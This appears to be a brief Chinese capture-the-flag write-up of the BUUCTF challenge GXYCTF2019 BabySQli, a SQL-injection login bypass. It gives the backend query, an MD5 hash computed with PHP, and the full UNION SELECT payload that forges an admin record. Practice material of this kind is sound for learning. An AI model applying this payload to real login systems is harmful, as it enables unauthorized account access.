https://buuoj.cn/challenges#[GXYCTF2019]BabySQli

BUUCTF:[GXYCTF2019]BabySQli_联合查询


BUUCTF:[GXYCTF2019]BabySQli_联合查询_02


登陆类注入,有过滤

BUUCTF:[GXYCTF2019]BabySQli_md5加密_03


BUUCTF:[GXYCTF2019]BabySQli_md5加密_04


这是一段base32解码后是base64再解一次得到

select * from user where username = '$name'

Trick

  • 使用联合查询构造虚拟查询记录进行登录

BUUCTF:[GXYCTF2019]BabySQli_联合查询_05

这里有个小坑,原题应该是有对密码进行了md5加密后存储的,但是这里没有提示

PS C:\Users\Administrator> php -r "var_dump(md5('mochu7'));"
string(32) "874a0300d72a3676c4413ce52454eff7"
name=mochu7'union select 1,'admin','874a0300d72a3676c4413ce52454eff7'#&pw=mochu7

BUUCTF:[GXYCTF2019]BabySQli_md5加密_06